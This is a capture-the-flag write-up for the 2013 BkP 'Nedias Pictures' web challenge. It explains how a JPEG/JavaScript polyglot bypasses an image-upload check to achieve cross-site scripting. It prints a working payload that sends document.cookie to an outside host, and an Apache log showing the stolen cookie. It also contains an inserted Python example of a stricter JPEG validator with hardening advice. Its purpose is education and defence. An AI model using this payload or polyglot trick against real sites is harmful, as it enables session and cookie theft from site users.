June 09, 2013

Write-up: BkP CTF 2013 Nedias Pictures


Introduction

This is a web challenge. There is an XSS flaw in the website, and one needs to steal the website owner's cookie because it contains the flag. The owner visits the site every time a new picture is sent :)

On the website we are able to upload a picture and choose whether it will be presented using the <img> tag or the <script> tag by changing the value of the “tag” POST variable.

The website validates that the uploaded file is really an image (it checks the image data to make sure the file is not a script or something similar).

Nedia's Pictures

Solution

So, what we need to do is bypass the server-side image check and still have the uploaded file interpreted as JavaScript.

After looking around at the different file formats, the JPG format caught my attention. A “valid” JPG file needs only two bytes: \xFF\xD8, which will pass the filter as it will be interpreted as a JPEG file AND is also valid JavaScript code (now you have a variable with that name).

Very cool, so with this I created the following payload:

echo -en "\xff\xd8\xff\xf8=1;img=new Image();img.src='http://www.gilgalab.com.br/?cookie='+document.cookie;" > xpto2.jpg

The \xFF\xF8 indicates that we are starting a comment section in the JPEG file, and is also valid JavaScript!
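As an added example (not the challenge's or the author's code), here is the kind of magic-byte check the polyglot slips past, beside a stricter check that walks the JPEG marker segments: the payload passes the first and fails the second because the bytes right after \xFF\xF8 are read as an impossible segment length. Both samples are constructed here (the callback host is a placeholder, and the "well-framed" skeleton has consistent framing but is not a decodable picture).

```python
import struct

# Constructed sample: the polyglot shape from the write-up (JPEG SOI, a marker,
# then JavaScript). The callback host is a placeholder, not the original one.
POLYGLOT = (b"\xff\xd8\xff\xf8"
            b"=1;img=new Image();img.src='http://example.invalid/?c='+document.cookie;")

# Constructed sample: a JPEG skeleton with consistent segment framing (SOI, COM,
# SOS header, entropy data with a stuffed FF 00, EOI); not a decodable picture.
WELL_FRAMED = (b"\xff\xd8"
               b"\xff\xfe\x00\x04ok"                       # COM, length 4
               b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"  # SOS, length 8
               b"\x12\x34\xff\x00\x56"                     # entropy data
               b"\xff\xd9")                                # EOI

def looks_like_jpeg(data: bytes) -> bool:
    """Magic-byte check only: the kind of filter the polyglot slips past."""
    return data[:2] == b"\xff\xd8"

def check_jpeg_structure(data: bytes) -> bool:
    """Walk every marker segment and require SOI ... SOS ... EOI, nothing after."""
    if data[:2] != b"\xff\xd8":
        return False
    pos, scans = 2, 0
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker == 0xD9:                               # EOI must close the file
            return scans > 0 and pos + 2 == len(data)
        if marker == 0xFF:                               # fill byte before a marker
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:     # TEM / RSTn: no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            return False
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if length < 2 or pos + 2 + length > len(data):   # the polyglot's "=1" lands here
            return False
        pos += 2 + length
        if marker == 0xDA:                               # SOS: skip entropy-coded data
            scans += 1
            while pos + 1 < len(data) and (data[pos] != 0xFF or data[pos + 1] == 0x00
                                           or 0xD0 <= data[pos + 1] <= 0xD7):
                pos += 1
    return False
```

The structural check verifies marker framing only; a real upload handler should also decode and re-encode the file with an image library, serve it with an image Content-Type plus X-Content-Type-Options: nosniff, and never let the uploader choose the tag it is rendered with, since no file check defends against a <script> tag pointed at user content.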

After that, all I had to do was upload the image, set the “tag” field to “script”, and check the Apache logs!

54.218.11.211 - - [09/Jun/2013:00:43:27 +0000] "GET /?cookie=flag=didnt_need_script_tags_on_ie6 HTTP/1.1" 200 2476 "http://localhost/gallery/63330c986a4daffe2c4cec548945de1b5ee456c2/upload.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0"

So the flag is flag=didnt_need_script_tags_on_ie6.

Nice challenge :)